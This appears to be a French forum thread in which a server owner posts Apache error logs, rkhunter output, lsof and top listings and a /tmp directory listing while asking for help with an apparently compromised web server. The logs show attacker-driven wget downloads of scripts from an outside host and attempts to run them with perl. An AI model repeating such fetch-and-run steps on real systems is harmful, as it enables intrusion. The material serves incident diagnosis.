et ça aujourd'hui :Citation
[Wed May 31 15:22:01 2006] [error] [client 68.142.250.76] File does not exist: /usr/share/psa-horde/robots.txt
--18:46:38-- [www.dougpoer.com]
=> `r.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 214
0K 100% 2.04 MB/s
18:46:39 (2.04 MB/s) - `r.txt' saved [214/214]
--18:46:39-- [www.dougpoer.com]
=> `geraw.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,427 [text/plain]
0K . 100% 13.61 MB/s
18:46:39 (13.61 MB/s) - `geraw.txt' saved [1,427/1,427]
--18:46:39-- [www.dougpoer.com]
=> `sc.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 2,859 [text/plain]
0K .. 100% 22.61 KB/s
18:46:40 (22.61 KB/s) - `sc.txt' saved [2,859/2,859]
--18:46:40-- [www.dougpoer.com]
=> `google.txt'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,662 [text/plain]
0K . 100% 105.67 MB/s
18:46:40 (105.67 MB/s) - `google.txt' saved [1,662/1,662]
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abrecanal(canal)'
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abreprograma(programa)'
[Wed May 31 19:20:24 2006] [error] [client 65.120.133.3] File does not exist:
Citation
[Fri Jun 02 01:06:42 2006] [error] [client 66.249.65.6] File does not exist: /usr/share/psa-horde/robots.txt
/: Unsupported scheme.
sh: line 1: CD: command not found
sh: line 1: WGET: command not found
--04:29:31-- [www.dougpoer.com]
=> `gg'
Resolving www.dougpoer.com... 63.246.151.128
Connecting to www.dougpoer.com[63.246.151.128]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1,519 [text/plain]
0K . 100% 14.49 MB/s
04:29:32 (14.49 MB/s) - `gg' saved [1,519/1,519]
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abrecanal(canal)'
sh: -c: line 1: syntax error near unexpected token `('
sh: -c: line 1: `perl google.txt abreprograma(programa)'
[Fri Jun 02 06:45:44 2006] [error] [client 217.33.219.194] File does not e
$ uptime 19:28:06 up 12 days, 20:46, 2 users, load average: 213.96, 212.37, 208.44
$ uptime 19:28:06 up 12 days, 20:46, 2 users, load average: 213.96, 212.37, 208.44
/bin p+md5+u+g+s /sbin p+md5+u+g+s /usr/bin p+md5+u+g+s /usr/sbin p+md5+u+g+s
Citation
auteur
root]# rkhunter -c
Rootkit Hunter 1.2.7 is running
Determining OS... Ready
Checking binaries
* Selftests
Strings (command) [ Skipped! ]
* System tools
Info: prelinked files found
Performing 'known good' check...
/bin/cat [ OK ]
/bin/chmod [ OK ]
/bin/chown [ OK ]
/bin/dmesg [ OK ]
/bin/egrep [ OK ]
/bin/env [ OK ]
/bin/fgrep [ OK ]
/bin/grep [ OK ]
/bin/kill [ OK ]
/bin/login [ OK ]
/bin/ls [ OK ]
/bin/mount [ OK ]
/bin/netstat [ OK ]
/bin/ps [ OK ]
/bin/su [ OK ]
/sbin/chkconfig [ OK ]
/sbin/depmod [ OK ]
/sbin/ifconfig [ OK ]
/sbin/init [ OK ]
/sbin/insmod [ OK ]
/sbin/ip [ OK ]
/sbin/modinfo [ OK ]
/sbin/runlevel [ OK ]
/sbin/sysctl [ OK ]
/sbin/syslogd [ OK ]
/usr/bin/file [ OK ]
/usr/bin/find [ OK ]
/usr/bin/kill [ OK ]
/usr/bin/killall [ OK ]
/usr/bin/lsattr [ OK ]
/usr/bin/pstree [ OK ]
/usr/bin/sha1sum [ OK ]
/usr/bin/stat [ OK ]
/usr/bin/users [ OK ]
/usr/bin/w [ OK ]
/usr/bin/watch [ OK ]
/usr/bin/who [ OK ]
/usr/bin/whoami [ OK ]
[Press <ENTER> to continue]
Check rootkits
* Default files and directories
Rootkit '55808 Trojan - Variant A'... [ OK ]
ADM Worm... [ OK ]
Rootkit 'AjaKit'... [ OK ]
Rootkit 'aPa Kit'... [ OK ]
Rootkit 'Apache Worm'... [ OK ]
Rootkit 'Ambient (ark) Rootkit'... [ OK ]
Rootkit 'Balaur Rootkit'... [ OK ]
Rootkit 'BeastKit'... [ OK ]
Rootkit 'beX2'... [ OK ]
Rootkit 'BOBKit'... [ OK ]
Rootkit 'CiNIK Worm (Slapper.B variant)'... [ OK ]
Rootkit 'Danny-Boy's Abuse Kit'... [ OK ]
Rootkit 'Devil RootKit'... [ OK ]
Rootkit 'Dica'... [ OK ]
Rootkit 'Dreams Rootkit'... [ OK ]
Rootkit 'Duarawkz'... [ OK ]
Rootkit 'Flea Linux Rootkit'... [ OK ]
Rootkit 'FreeBSD Rootkit'... [ OK ]
Rootkit 'Fuck`it Rootkit'... [ OK ]
Rootkit 'GasKit'... [ OK ]
Rootkit 'Heroin LKM'... [ OK ]
Rootkit 'HjC Kit'... [ OK ]
Rootkit 'ignoKit'... [ OK ]
Rootkit 'ImperalsS-FBRK'... [ OK ]
Rootkit 'Irix Rootkit'... [ OK ]
Rootkit 'Kitko'... [ OK ]
Rootkit 'Knark'... [ OK ]
Rootkit 'Li0n Worm'... [ OK ]
Rootkit 'Lockit / LJK2'... [ OK ]
Rootkit 'MRK'... [ OK ]
Rootkit 'Ni0 Rootkit'... [ OK ]
Rootkit 'RootKit for SunOS / NSDAP'... [ OK ]
Rootkit 'Optic Kit (Tux)'... [ OK ]
Rootkit 'Oz Rootkit'... [ OK ]
Rootkit 'Portacelo'... [ OK ]
Rootkit 'R3dstorm Toolkit'... [ OK ]
Rootkit 'RH-Sharpe's rootkit'... [ OK ]
Rootkit 'RSHA's rootkit'... [ OK ]
Sebek LKM [ OK ]
Rootkit 'Scalper Worm'... [ OK ]
Rootkit 'Shutdown'... [ OK ]
Rootkit 'SHV4'... [ OK ]
Rootkit 'SHV5'... [ OK ]
Rootkit 'Sin Rootkit'... [ OK ]
Rootkit 'Slapper'... [ OK ]
Rootkit 'Sneakin Rootkit'... [ OK ]
Rootkit 'Suckit Rootkit'... [ OK ]
Rootkit 'SunOS Rootkit'... [ OK ]
Rootkit 'Superkit'... [ OK ]
Rootkit 'TBD (Telnet BackDoor)'... [ OK ]
Rootkit 'TeLeKiT'... [ OK ]
Rootkit 'T0rn Rootkit'... [ OK ]
Rootkit 'Trojanit Kit'... [ OK ]
Rootkit 'Tuxtendo'... [ OK ]
Rootkit 'URK'... [ OK ]
Rootkit 'VcKit'... [ OK ]
Rootkit 'Volc Rootkit'... [ OK ]
Rootkit 'X-Org SunOS Rootkit'... [ OK ]
Rootkit 'zaRwT.KiT Rootkit'... [ OK ]
* Suspicious files and malware
Scanning for known rootkit strings [ Skipped ]
/usr/local/bin/rkhunter: line 1: strings: command not found
Scanning for known rootkit files [ OK ]
Testing running processes... [ OK ]
Miscellaneous Login backdoors [ OK ]
Miscellaneous directories [ OK ]
Software related files [ OK ]
Sniffer logs [ OK ]
[Press <ENTER> to continue]
* Trojan specific characteristics
shv4
Checking /etc/rc.d/rc.sysinit
Test 1 [ Clean ]
Test 2 [ Clean ]
Test 3 [ Clean ]
Checking /etc/inetd.conf [ Not found ]
Checking /etc/xinetd.conf [ Clean ]
* Suspicious file properties
chmod properties
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
Script replacements
Checking /bin/ps [ Clean ]
Checking /bin/ls [ Clean ]
Checking /usr/bin/w [ Clean ]
Checking /usr/bin/who [ Clean ]
Checking /bin/netstat [ Clean ]
Checking /bin/login [ Clean ]
* OS dependant tests
Linux
Checking loaded kernel modules... [ OK ]
Checking files attributes [ OK ]
Checking LKM module path [ OK ]
Networking
* Check: frequently used backdoors
Port 2001: Scalper Rootkit [ OK ]
Port 2006: CB Rootkit [ OK ]
Port 2128: MRK [ OK ]
Port 14856: Optic Kit (Tux) [ OK ]
Port 47107: T0rn Rootkit [ OK ]
Port 60922: zaRwT.KiT [ OK ]
* Interfaces
Scanning for promiscuous interfaces [ OK ]
[Press <ENTER> to continue]
System checks
* Allround tests
Checking hostname... Found. Hostname is d096.nexlink.net
Checking for passwordless user accounts... OK
Checking for differences in user accounts... OK. No changes.
Checking for differences in user groups... OK. No changes.
Checking boot.local/rc.local file...
- /etc/rc.local [ OK ]
- /etc/rc.d/rc.local [ OK ]
- /usr/local/etc/rc.local [ Not found ]
- /usr/local/etc/rc.d/rc.local [ Not found ]
- /etc/conf.d/local.start [ Not found ]
- /etc/init.d/boot.local [ Not found ]
Checking rc.d files...
Processing........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
........................................
Result rc.d files check [ OK ]
Checking history files
Bourne Shell [ OK ]
* Filesystem checks
Checking /dev for suspicious files... [ OK ]
Scanning for hidden files... [ OK ]
[Press <ENTER> to continue]
Application advisories
* Application scan
Checking Apache2 modules ... [ Not found ]
Checking Apache configuration ... [ OK ]
* Application version scan
- GnuPG 1.2.4 [ OK ]
- Apache 2.0.51 [ Old or patched version ]
- Bind DNS 9.2.3 [ Unknown ]
- OpenSSL 0.9.7a [ Old or patched version ]
- PHP 4.3.10 [ Old or patched version ]
- Procmail MTA 3.22 [ OK ]
- ProFTPd 1.2.10 [ OK ]
- OpenSSH 3.6.1p2 [ Old or patched version ]
Your system contains some unknown version numbers. Please run Rootkit Hunter
with the --update parameter or fill in the contact form (www.rootkit.nl)
Security advisories
* Check: Groups and Accounts
Searching for /etc/passwd... [ Found ]
Checking users with UID '0' (root)... [ OK ]
* Check: SSH
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
* Check: Events and Logging
Search for syslog configuration... [ OK ]
Checking for running syslog slave... [ OK ]
Checking for logging to remote system... [ OK (no remote logging) ]
[Press <ENTER> to continue]
---------------------------- Scan results ----------------------------
MD5
MD5 compared: 49
Incorrect MD5 checksums: 0
File scan
Scanned files: 342
Possible infected files: 0
Application scan
Vulnerable applications: 4
Scanning took 39 seconds
-----------------------------------------------------------------------
Do you have some problems, undetected rootkits, false positives, ideas
or suggestions?
Please e-mail me by filling in the contact form (@[www.rootkit.nl])
-----------------------------------------------------------------------
et le resultat de top -cCitation
auteur
root]# lsof -ni
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
httpsd 1399 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
portmap 2415 rpc 3u IPv4 2547 UDP *:sunrpc
portmap 2415 rpc 4u IPv4 2550 TCP *:sunrpc (LISTEN)
rpc.statd 2434 rpcuser 4u IPv4 2580 UDP *:32768
rpc.statd 2434 rpcuser 5u IPv4 2570 UDP *:914
rpc.statd 2434 rpcuser 6u IPv4 2583 TCP *:32768 (LISTEN)
snmpd 2586 root 8u IPv4 2836 TCP *:smux (LISTEN)
snmpd 2586 root 9u IPv4 2837 UDP *:snmp
cupsd 2597 root 0u IPv4 2919 TCP 127.0.0.1:ipp (LISTEN)
cupsd 2597 root 2u IPv4 2920 UDP *:ipp
named 2729 named 20u IPv4 3015 UDP 127.0.0.1:domain
named 2729 named 21u IPv4 3016 TCP 127.0.0.1:domain (LISTEN)
named 2729 named 22u IPv4 3033 UDP @ip_de_mon_serveur:domain
named 2729 named 23u IPv4 3034 TCP @ip_de_mon_serveur:domain (LISTEN)
named 2729 named 24u IPv4 3035 UDP *:32769
named 2729 named 25u IPv6 3036 UDP *:32770
named 2729 named 26u IPv4 3037 TCP 127.0.0.1:rndc (LISTEN)
sshd 2784 root 3u IPv6 3029 TCP *:ssh (LISTEN)
xinetd 2797 root 5u IPv4 3155 TCP *:ftp (LISTEN)
xinetd 2797 root 6u IPv4 3156 TCP *:poppassd (LISTEN)
xinetd 2797 root 8u IPv4 3157 TCP 127.0.0.1:32769 (LISTEN)
xinetd 2797 root 9u IPv4 3160 TCP *:smtp (LISTEN)
xinetd 2797 root 10u IPv4 3161 TCP *:smtps (LISTEN)
mysqld 2839 mysql 3u IPv4 3095 TCP *:mysql (LISTEN)
postmaste 2886 postgres 4u IPv4 3146 UDP 127.0.0.1:32771->127.0.0.1:32771
postmaste 2887 postgres 4u IPv4 3146 UDP 127.0.0.1:32771->127.0.0.1:32771
couriertc 2915 root 5u IPv4 3498 TCP *:imap (LISTEN)
couriertc 2927 root 5u IPv4 3519 TCP *:imaps (LISTEN)
couriertc 2937 root 5u IPv4 3540 TCP *:pop3 (LISTEN)
couriertc 2948 root 5u IPv4 3561 TCP *:pop3s (LISTEN)
spamd 2992 root 5u IPv4 3708 TCP 127.0.0.1:783 (LISTEN)
httpd 3075 root 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3075 root 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3145 root 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3145 root 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3150 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3150 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 3152 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 3152 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpsd 3192 root 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3196 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3197 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3198 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3199 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3200 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
httpsd 3252 psaadm 16u IPv4 4807 TCP *:8443 (LISTEN)
drwebd 3256 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3257 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3258 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3259 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3260 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3261 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3262 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3263 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3264 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3265 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3266 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3267 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3268 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3269 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3270 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3271 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
drwebd 3272 drweb 3u IPv4 5006 TCP 127.0.0.1:3000 (LISTEN)
miniserv. 3395 root 5u IPv4 5764 TCP *:10000 (LISTEN)
miniserv. 3395 root 6u IPv4 5765 UDP *:10000
sshd 5014 root 4u IPv6 694532 TCP @ip_de_mon_serveur:ssh->213.154.92.24:2691 (ESTABLISHED)
qmail-rem 5213 qmailr 3u IPv4 767653 TCP @ip_de_mon_serveur:38151->4.79.181.14:smtp (ESTABLISHED)
httpd 8473 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 8473 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 9768 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 9768 apache 4u IPv6 3967 TCP *:https (LISTEN)
qmail-rem 14120 qmailr 3u IPv4 778672 TCP @ip_de_mon_serveur:38198->67.28.113.73:smtp (ESTABLISHED)
qmail-rem 15313 qmailr 3u IPv4 726533 TCP @ip_de_mon_serveur:38020->67.28.113.10:smtp (ESTABLISHED)
qmail-rem 15421 qmailr 3u IPv4 726770 TCP @ip_de_mon_serveur:38029->67.28.113.10:smtp (ESTABLISHED)
qmail-rem 15475 qmailr 3u IPv4 726450 TCP @ip_de_mon_serveur:38013->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15516 qmailr 3u IPv4 726043 TCP @ip_de_mon_serveur:37990->4.79.181.135:smtp (ESTABLISHED)
qmail-rem 15542 qmailr 3u IPv4 726638 TCP @ip_de_mon_serveur:38024->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15670 qmailr 3u IPv4 726712 TCP @ip_de_mon_serveur:38027->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 15899 qmailr 3u IPv4 727526 TCP @ip_de_mon_serveur:38065->4.79.181.13:smtp (ESTABLISHED)
httpd 17117 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17117 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17131 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17131 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17132 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17132 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17137 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17137 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17159 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17159 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17161 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17161 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17169 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17169 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17170 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17170 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17173 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17173 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17176 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17176 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17183 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17183 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17184 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17184 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17200 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17200 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17201 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17201 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17211 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17211 apache 4u IPv6 3967 TCP *:https (LISTEN)
httpd 17217 apache 3u IPv6 3965 TCP *:http (LISTEN)
httpd 17217 apache 4u IPv6 3967 TCP *:https (LISTEN)
qmail-rem 24739 qmailr 3u IPv4 745843 TCP @ip_de_mon_serveur:38119->67.28.113.19:smtp (ESTABLISHED)
qmail-rem 24790 qmailr 3u IPv4 736048 TCP @ip_de_mon_serveur:38116->67.28.113.70:smtp (ESTABLISHED)
qmail-rem 29931 qmailr 3u IPv4 816016 TCP @ip_de_mon_serveur:38281->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 30136 qmaild 0u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-smt 30136 qmaild 1u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-smt 30136 qmaild 2u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-rem 30137 qmailr 3u IPv4 816834 TCP @ip_de_mon_serveur:38323->4.79.181.13:smtp (ESTABLISHED)
qmail-que 30141 drweb 2u IPv4 816817 TCP @ip_de_mon_serveur:smtp->213.154.94.108:1478 (ESTABLISHED)
qmail-rem 30489 qmailr 3u IPv4 818163 TCP @ip_de_mon_serveur:38410->4.79.181.13:smtp (ESTABLISHED)
qmail-rem 30554 qmailr 3u IPv4 818903 TCP @ip_de_mon_serveur:38453->67.28.113.19:smtp (ESTABLISHED)
qmail-rem 30821 qmailr 3u IPv4 819562 TCP @ip_de_mon_serveur:38497->4.79.181.13:smtp (ESTABLISHED)
qmail-smt 30907 qmaild 0u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-smt 30907 qmaild 1u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-smt 30907 qmaild 2u IPv4 819911 TCP @ip_de_mon_serveur:smtp->212.23.126.23:32277 (ESTABLISHED)
qmail-rem 30913 qmailr 3u IPv4 820372 TCP @ip_de_mon_serveur:38540->67.28.113.19:smtp (SYN_SENT)
qmail-rem 30954 qmailr 3u IPv4 820099 TCP @ip_de_mon_serveur:38527->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 31026 qmaild 0u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-smt 31026 qmaild 1u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-smt 31026 qmaild 2u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
qmail-que 31031 drweb 2u IPv4 820388 TCP @ip_de_mon_serveur:smtp->61.152.188.88:4035 (ESTABLISHED)
tcp-env 31077 root 0u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 1u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 2u IPv4 820612 TCP @ip_de_mon_serveur:smtp->218.5.74.84:3626 (ESTABLISHED)
tcp-env 31077 root 3u IPv4 820622 TCP @ip_de_mon_serveur:38550->218.5.74.84:auth (SYN_SENT)
qmail-rem 31092 qmailr 3u IPv4 820679 TCP @ip_de_mon_serveur:38554->4.79.181.13:smtp (SYN_SENT)
tcp-env 31093 root 0u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 1u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 2u IPv4 820681 TCP @ip_de_mon_serveur:smtp->220.72.119.33:2000 (ESTABLISHED)
tcp-env 31093 root 3u IPv4 820685 TCP @ip_de_mon_serveur:38555->220.72.119.33:auth (SYN_SENT)
qmail-rem 31101 qmailr 3u IPv4 820721 TCP @ip_de_mon_serveur:38558->67.28.113.70:smtp (ESTABLISHED)
qmail-smt 31102 qmaild 0u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
qmail-smt 31102 qmaild 1u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
qmail-smt 31102 qmaild 2u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
tcp-env 31106 root 0u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 1u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 2u IPv4 820734 TCP @ip_de_mon_serveur:smtp->61.145.121.80:44028 (ESTABLISHED)
tcp-env 31106 root 3u IPv4 820740 TCP @ip_de_mon_serveur:38559->61.145.121.80:auth (SYN_SENT)
spamd 31116 popuser 11u IPv4 820778 UDP *:59156
qmail-que 31121 drweb 2u IPv4 820722 TCP @ip_de_mon_serveur:smtp->61.152.108.4:1520 (ESTABLISHED)
Je precise egalement que tous les logs se trouvent dans /var/logCitation
auteur
top - 15:56:09 up 1 day, 6:57, 1 user, load average: 0.16, 0.16, 0.17
Tasks: 150 total, 1 running, 149 sleeping, 0 stopped, 0 zombie
Cpu(s): 7.6% us, 2.0% sy, 0.0% ni, 89.4% id, 0.7% wa, 0.3% hi, 0.0% si
Mem: 1027444k total, 806752k used, 220692k free, 156772k buffers
Swap: 385552k total, 280k used, 385272k free, 156656k cached
PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND
1290 popuser 20 0 26744 21m 2640 S 6.6 2.1 0:00.20 /usr/bin/spamd --u
440 root 15 0 0 0 0 S 0.3 0.0 0:12.02 [kjournald]
3263 drweb 16 0 12576 8104 2304 S 0.3 0.8 0:08.69 /opt/drweb/drwebd
1116 root 16 0 3592 948 728 R 0.3 0.1 0:00.16 top -c
1 root 16 0 1708 456 392 S 0.0 0.0 0:00.82 init [3]
2 root 34 19 0 0 0 S 0.0 0.0 0:00.12 [ksoftirqd/0]
3 root 5 -10 0 0 0 S 0.0 0.0 0:09.16 [events/0]
4 root 11 -10 0 0 0 S 0.0 0.0 0:00.00 [khelper]
16 root 15 -10 0 0 0 S 0.0 0.0 0:00.00 [kacpid]
96 root 5 -10 0 0 0 S 0.0 0.0 0:01.59 [kblockd/0]
104 root 15 0 0 0 0 S 0.0 0.0 0:00.00 [khubd]
158 root 20 0 0 0 0 S 0.0 0.0 0:00.00 [pdflush]
159 root 15 0 0 0 0 S 0.0 0.0 0:00.51 [pdflush]
161 root 14 -10 0 0 0 S 0.0 0.0 0:00.00 [aio/0]
160 root 16 0 0 0 0 S 0.0 0.0 0:01.76 [kswapd0]
254 root 25 0 0 0 0 S 0.0 0.0 0:00.00 [kseriod]
1513 root 15 0 0 0 0 S 0.0 0.0 0:00.00 [kjournald]
Que dois je faire de mon sshd_config ?Citation
auteur
Searching for sshd_config...
Found /etc/ssh/sshd_config
Checking for allowed root login... Watch out Root login possible. Possible risk!
info:
Hint: See logfile for more information about this issue
Checking for allowed protocols... [ Warning (SSH v1 allowed) ]
ls -al /tmp ls -al /var/tmpet nous donner le résulat.
Protocol 2 PermitRootLogin no
tmp]# ls -al total 1264 drwxrwxrwt 6 root root 12288 Jun 8 12:58 . drwxr-xr-x 21 root root 4096 Jun 8 08:23 .. -rw-r--r-- 1 root root 312 Jun 8 09:51 autoinstaller.log drwx------ 2 apache apache 4096 Feb 11 2002 belea -rw------- 1 apache apache 350063 Dec 24 17:25 flood.tar.gz drwxrwxrwt 2 xfs xfs 4096 Jun 8 08:24 .font-unix -rw------- 1 apache apache 1519 Jun 2 03:28 gg -rw------- 1 apache apache 1701 Jun 1 11:11 google.txt drwxrwxrwt 2 root root 4096 Jun 8 08:23 .ICE-unix -rw------- 1 root root 0 Jun 8 09:51 psa-installer.lock drwxr-xr-x 3 root root 4096 Jun 2 15:40 rkhunter -rw-r--r-- 1 root root 170732 May 24 2005 rkhunter-1.2.7.tar.gz -rw------- 1 apache apache 2859 Jun 1 11:11 sc.txt -rw------- 1 apache apache 700086 Jun 2 10:13 sites.txt srw-rw-rw- 1 popuser root 0 Jun 8 08:24 spamd_full.sock srw-rw-rw- 1 popuser root 0 Jun 8 08:24 spamd_light.sock srwxrwxrwx 1 postgres postgres 0 Jun 8 13:09 .s.PGSQL.5432 -rw------- 1 postgres postgres 25 Jun 8 13:09 .s.PGSQL.5432.lock -rw------- 1 apache apache 2308 Jun 2 04:29 wlist.txtlà à part le fichier rkhunter que j'ai installé, je connais pas les autres. Est ce que je dois tous les supprimé ?